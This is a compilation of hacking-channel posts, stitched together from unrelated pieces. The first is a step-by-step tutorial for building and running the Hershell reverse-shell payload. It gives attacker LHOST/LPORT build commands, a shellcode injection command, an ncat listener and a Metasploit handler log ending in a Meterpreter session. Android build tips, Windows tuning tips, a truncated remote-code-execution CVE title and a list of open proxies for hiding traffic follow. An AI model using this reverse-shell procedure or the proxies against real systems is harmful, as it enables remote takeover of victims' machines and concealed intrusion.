▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑REVERSE SHELL GENERATOR TUTORIAL BY UNDERCODE :
t.me/UndercodeTesting


🦑𝕃𝔼𝕋'𝕊 𝕊𝕋𝔸ℝ𝕋 :

The current version of Hershell supports the following operating systems:

Windows

Linux

macOS

FreeBSD


Development purpose

🦑 Although Meterpreter Payload can sometimes be used, antivirus products can easily detect this method. Therefore, Hershell came into being, it can provide us with TCP-based reverse Shell, and can support a variety of different operating system platforms.

Tools use related components



Hershell was developed using Go language. First, we need to complete the Go environment settings on the device according to the Go official manual, and then set the $ GOPATH environment variable.



Next, run the following command to obtain the project source code:



go get github.com/lesnuages/hershell

Build payload



When building the payload, we can choose to use the provided Makefile to complete the build. At this point, we need to set the following environment variables:



GOOS: target operating system



GOARCH: target architecture



LHOST: attacker IP or host domain name



LPORT: listener port



Of course, we also provide some variable values in the Makefile for reference:



depends: Generate server certificate (required for reverse shell)



Windows32: Generate 32-bit Windows executable file (PE 32-bit)



Windows64: Build 64-bit Windows executable file (PE 64-bit)



linux32: build a 32-bit Linux executable file (ELF 32-bit)



linux64: build 64-bit Linux executable files (ELF 64-bit)



macos32: build a 32-bit macOS executable file (Mach-O)



macos64: build a 64-bit macOS executable file (Mach-O)

For the target platform in the above list, we also need to set two environment variables LHOST and LPORT.

🦑 Use reverse Shell

After the code starts executing, the tool will provide us with a remote shell, which is a custom interactive shell that allows us to execute system commands through cmd.exe on Windows or / bin / sh on Unix devices.



The following table shows some specific commands supported by Hershell:

run_shell: Get the system shell


inject <base64 shellcode>: Inject shellcode (Base64 encoding) into the same process memory and execute the code.



meterpreter [tcp | http | https: IP: PORT: establish a connection with multiple processors, and obtain the second stage reverse TCP, HTTP or HTTPS meter from Metasploit, and then execute Shellcode in memory (this function is currently only supported on Windows platform).



exit: Exit the program

Tool use

🦑 First, we need to use the following command to generate a valid certificate:

$ make depends

openssl req -subj '/CN=yourcn.com/O=YourOrg/C=FR' -new -newkey rsa:4096 -days 3650 -nodes -x509 -keyout server.key -out server.pem

Generating a 4096 bit RSA private key

....................................................................................++

.....++

writing new private key to 'server.key'

-----

cat server.key >> server.pem

For Windows platforms:



# Predifined 32 bit target

$ make windows32 LHOST = 192.168.0.12 LPORT = 1234

# Predifined 64 bit target

$ make windows64 LHOST = 192.168.0.12 LPORT = 1234

For Linux platforms:



# Predifined 32 bit target

$ make linux32 LHOST = 192.168.0.12 LPORT = 1234

# Predifined 64 bit target

$ make linux64 LHOST = 192.168.0.12 LPORT = 1234

For macOS platform:

$ make macos LHOST = 192.168.0.12 LPORT = 1234

🦑Tool usage examples

Basic use

We can use various tools to handle incoming connections, for example:

shocked

ncat

openssl server module

🦑Various handlers of Metasploit (python / shell_reverse_tcp_ssl payload)

The following is an example using ncat:



$ ncat --ssl --ssl-cert server.pem --ssl-key server.key -lvp 1234

Ncat: Version 7.60 ( https://nmap.org/ncat )

Ncat: Listening on :::1234

Ncat: Listening on 0.0.0.0:1234

Ncat: Connection from 172.16.122.105.

Ncat: Connection from 172.16.122.105:47814.

[hershell]> whoami

desktop-3pvv31a\lab

Meterpreter scene



Note: Currently only Windows platform supports this feature.



🦑 The Meterpreter usage of this tool currently only supports the following loads:



windows/meterpreter/reverse_tcp



windows/x64/meterpreter/reverse_tcp



windows/meterpreter/reverse_http



windows/x64/meterpreter/reverse_http



windows/meterpreter/reverse_https



windows/x64/meterpreter/reverse_https

🦑When you choose to use a certain payload, don't forget to choose the correct transmission port (tcp, http or https).



MeterpreterHandler uses the following example:

[14:12:45][172.16.122.105][Sessions: 0][Jobs: 0] > use exploit/multi/handler

[14:12:57][172.16.122.105][Sessions: 0][Jobs: 0] exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_https

payload => windows/x64/meterpreter/reverse_https

[14:13:12][172.16.122.105][Sessions: 0][Jobs: 0] exploit(multi/handler) > set lhost 172.16.122.105

lhost => 172.16.122.105

[14:13:15][172.16.122.105][Sessions: 0][Jobs: 0] exploit(multi/handler) > set lport 8443

lport => 8443

[14:13:17][172.16.122.105][Sessions: 0][Jobs: 0] exploit(multi/handler) > set HandlerSSLCert ./server.pem

HandlerSSLCert => ./server.pem

[14:13:26][172.16.122.105][Sessions: 0][Jobs: 0] exploit(multi/handler) > exploit -j

🦑Exploit running as background job 0.



[*] [2018.01.29-14:13:29] Started HTTPS reverse handler on https://172.16.122.105:8443

[14:13:29][172.16.122.105][Sessions: 0][Jobs: 1] exploit(multi/handler) >

Next, in hershell, use the meterpreter command:



[hershell]> meterpreter https 172.16.122.105:8443

At this point, we will be able to get a new Meterpreter session in msfconsole:

[14:13:29][172.16.122.105][Sessions: 0][Jobs: 1] exploit(multi/handler) >

[*] [2018.01.29-14:16:44] https://172.16.122.105:8443 handling request from 172.16.122.105; (UUID: pqzl9t5k) Staging x64 payload (206937 bytes) ...

[*] Meterpreter session 1 opened (172.16.122.105:8443 -> 172.16.122.105:44804) at 2018-01-29 14:16:44 +0100



[14:16:46][172.16.122.105][Sessions: 1][Jobs: 1] exploit(multi/handler) > sessions



🦑Active sessions

===============



Id Name Type Information Connection

-- ---- ---- ----------- ----------

1 meterpreter x64/windows DESKTOP-3PVV31A\lab @ DESKTOP-3PVV31A 172.16.122.105:8443 -> 172.16.122.105:44804 (10.0.2.15)



[14:16:48][172.16.122.105][Sessions: 1][Jobs: 1] exploit(multi/handler) > sessions -i 1

[*] Starting interaction with 1...



meter preter> indicated

Server username: DESKTOP-3PVV31A\lab

written by undercode
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 FOR EXPERTS SPEED UP ANDROID BUILD

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Optimize your build configuration
t.me/UndercodeTesting


🦑 Follow these tips to improve the build speed of your Android Studio project.

1) Keep your tools up-to-date

2) The Android tools receive build optimizations and new features with almost every update, and some tips on this page assume you're using the latest version. To take advantage of the latest optimizations, keep the following up to date:

🦑 Android Studio and SDK tools

> The Android plugin for Gradle

> Create a build variant for development

> Many of the configurations you need when preparing your app for
release are not required while developing your app. Enabling unnecessary build processes slows down your incremental and clean builds, so configure a build variant that keeps only the build configurations you need while developing your app. The following sample creates a "dev" flavor and a "prod" flavor (for your release version configurations):

🦑android {
...
defaultConfig {...}
buildTypes {...}
productFlavors {
// When building a variant that uses this flavor, the following configurations
// override those in the defaultConfig block.
dev {
// To avoid using legacy multidex when building from the command line,
// set minSdkVersion to 21 or higher. When using Android Studio 2.3 or higher,
// the build automatically avoids legacy multidex when deploying to a device running
// API level 21 or higher—regardless of what you set as your minSdkVersion.
minSdkVersion 21
versionNameSuffix "-dev"
applicationIdSuffix '.dev'
}

prod {
// If you've configured the defaultConfig block for the release version of
// your app, you can leave this block empty and Gradle uses configurations in
// the defaultConfig block instead. You still need to create this flavor.
// Otherwise, all variants use the "dev" flavor configurations.
}
}
}

3) If your build configuration already uses product flavors to create different versions of your app, you can combine the "dev" and "prod" configurations with those flavors by using flavor dimensions. For example, if you already configure a "demo" and "full" flavor, you can use the following sample configuration to create combined flavors, such as "devDemo" and "prodFull":

android {
...
defaultConfig {...}
buildTypes {...}

// Specifies the flavor dimensions you want to use. The order in which you
// list each dimension determines its priority, from highest to lowest,
// when Gradle merges variant sources and configurations. You must assign
// each product flavor you configure to one of the flavor dimensions.

flavorDimensions "stage", "mode"

productFlavors {
dev {
dimension "stage"
minSdkVersion 21
versionNameSuffix "-dev"
applicationIdSuffix '.dev'
...
}

prod {
dimension "stage"
...
}

demo {
dimension "mode"
...
}

full {
dimension "mode"
...
}
}
}

4) Enable single-variant project sync

> Syncing your project with your build configuration is an important step in letting Android Studio understand how your project is structured. However, this process can be time-consuming for large projects. If your project uses multiple build variants, you can now optimize project syncs by limiting them to only the variant you have currently selected.

5) You need to use Android Studio 3.3 or higher with Android Gradle Plugin 3.3.0 or higher to enable this optimization. The optimization is enabled by default on all projects.

6) To enable this optimization manually, click File > Settings > Experimental > Gradle (Android Studio > Preferences > Experimental > Gradle on a Mac) and select the Only sync the active variant checkbox.

7) Avoid compiling unnecessary resources
Avoid compiling and packaging resources that you aren't testing (such as additional language localizations and screen-density resources). You can do that by only specifying one language resource and screen density for your "dev" flavor, as shown in the following sample:

android {
...
productFlavors {
dev {
...
// The following configuration limits the "dev" flavor to using
// English stringresources and xxhdpi screen-density resources.
resConfigs "en", "xxhdpi"
}
...
}
}

8) Disable Crashlytics for your debug builds
If you don't need to run a Crashlytics report, speed up your debug builds by disabling the plugin as follows:

android {
...
buildTypes {
debug {
ext.enableCrashlytics = false
}
}

You also need to disable the Crashlytics kit at runtime for debug builds by changing the way you initialize support for Fabric in your app, as shown below:

KOTLIN
JAVA
// Initializes Fabric for builds that don't use the debug build type.
Crashlytics.Builder()
.core(CrashlyticsCore.Builder().disabled(BuildConfig.DEBUG).build())
.build()
.also { crashlyticsKit ->
Fabric.with(this, crashlyticsKit)
}

9) Disable automatic build ID generation
If you want to use Crashlytics with your debug builds, you can still speed up incremental builds by preventing Crashlytics from updating app resources with its own unique build ID during every build. Because this build ID is stored in a resource file that is referenced by the manifest, disabling automatic build ID generation also allows you to use Apply Changes alongside Crashlytics for your debug builds.

To prevent Crashlytics from automatically updating its build ID, add the following to your build.gradle file:

android {
...
buildTypes {
debug {
ext.alwaysUpdateBuildId = false
}
}


10) Enable offline mode
If you are on a slow network connection, your build times may suffer when Gradle attempts to use network resources to resolve dependencies. You can tell Gradle to avoid using network resources by using only the artifacts that it has cached locally.

To use Gradle offline when building with Android Studio, proceed as follows:

Open the Preferences window by clicking File > Settings (on Mac, Android Studio > Preferences).
In the left pane, click Build, Execution, Deployment > Gradle.
Check the Offline work checkbox.
Click Apply or OK.
If you're building from the command line, pass the --offline option.

11) Create library modules
Look for code in your app that you can convert into an Android library module. Modularizing your code this way allows the build system to compile only the modules you modify and cache those outputs for future builds. It also makes parallel project execution more effective (when you enable that optimization).

@undercodeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 FOR EXPERTS SPEED UP ANDROID BUILD ;)

#SUPPORT & SHARE :

T.me/UndercodeTesting

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑SPEEDUP WINDOWS 10 FAST TIPS
T.me/UndercodeTesting


1) Restart your PC. While this may seem an obvious step, many users

2) keep their machines running for weeks at a time. ...

3) Updates

4) Check startup apps.

5) Run Disk Cleanup.

6) Remove unused software.

7) Disable special effects.

8) Disable transparency effects.

9) Upgrade your RAM.

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 2020 CVE VERIFIED BY UNDERCODE
> Pisay Online E-Learning System 1.0 - Remote Code Executio

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 FRESH PREMIUM PROXIES 2020 :
pinterest.com/undercode_Testing

125.94.44.129 1080 1 hour ago
5110 ms 7% (80) cn China Elite -
159.8.114.37 80 1 hour ago
452 ms 96% (46) fr France - Clichy Elite -
159.8.114.34 8123 1 hour ago
623 ms 100% (45) fr France - Clichy Elite -
218.204.153.156 443 1 hour ago
3201 ms 28% (74) cn China Elite -
34.92.94.5 8123 1 hour ago
937 ms 40% (10) us United States Elite -
36.75.130.126 80 1 hour ago
1387 ms 96% (21) id Indonesia Elite -
52.161.188.146 80 1 hour ago
202 ms 100% (42) us United States - Cheyenne Elite -
52.161.188.147 80 1 hour ago
204 ms 100% (47) us United States - Cheyenne Elite -
60.251.40.84 1080 1 hour ago
696 ms 48% (70) tw Taiwan - Keelung Elite -
62.213.14.166 8080 1 hour ago
3421 ms 25% (82) ru Russia - Samara Elite -
169.57.157.148 8123 1 hour ago
564 ms 23% (72) br Brazil - São Paulo Elite -
182.138.160.189 8118 1 hour ago
2029 ms 17% (72) cn China Elite -


183.64.239.19 8060 1 hour ago
2298 ms 17% (74) cn China - Chongqing Elite -
182.191.84.39 80 1 hour ago
4028 ms 18% (75) pk Pakistan - Mardan Elite -
195.110.6.30 8118 1 hour ago
1224 ms 5% (66) ua Ukraine - Simferopol Elite -
190.210.8.70 8080 1 hour ago
3160 ms 6% (77) ar Argentina - Buenos Aires Elite -
200.106.55.125 80 1 hour ago
2564 ms 100% (16) pe Peru - Lima Elite -
103.242.44.80 8080 1 hour ago
3271 ms 33% (64) mn Mongolia Elite -
112.111.77.95 9999 1 hour ago
2010 ms 2% (96) cn China - Fuzhou Elite -
105.247.171.202 8080 1 hour ago
3787 ms 14% (84) za South Africa - Durban Elite -
159.8.114.37 8123 1 hour ago
455 ms 96% (47) fr France - Clichy Elite -
125.162.229.74 8080 1 hour ago
2615 ms 26% (31) id Indonesia Elite -
140.227.174.216 1000 1 hour ago
2648 ms 17% (79) jp Japan Elite -
144.76.214.159 1080 1 hour ago
3321 ms 43% (57) de Germany Elite -
197.216.2.14 8080 1 hour ago
951 ms 86% (56) ao Angola Elite -
213.96.26.189 8080 1 hour ago
1175 ms 96% (44) es Spain Elite -
47.113.108.233 8080 1 hour ago
1907 ms 37% (57) cn China Elite -
5.196.255.171 3128 1 hour ago
4094 ms 10% (81) fr France Elite -
101.37.118.54 8888 1 hour ago
1130 ms 70% (49) cn China - Hangzhou Elite -
18.163.28.22 1080 1 hour ago
1607 ms 68% (53) hk Hong Kong Elite -
118.89.91.108 8888 1 hour ago
1959 ms 33% (58) cn China - Beijing Elite -
119.206.222.160 80 1 hour ago
755 ms 59% (60) kr South Korea - Incheon Elite -
121.17.210.114 8060 1 hour ago
2745 ms 38% (8) cn China Elite -
125.59.223.27 8380 1 hour ago
759 ms 16% (79) hk Hong Kong Elite -
123.194.231.55 8197 1 hour ago
777 ms 25% (73) tw Taiwan - Taipei Elite -

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁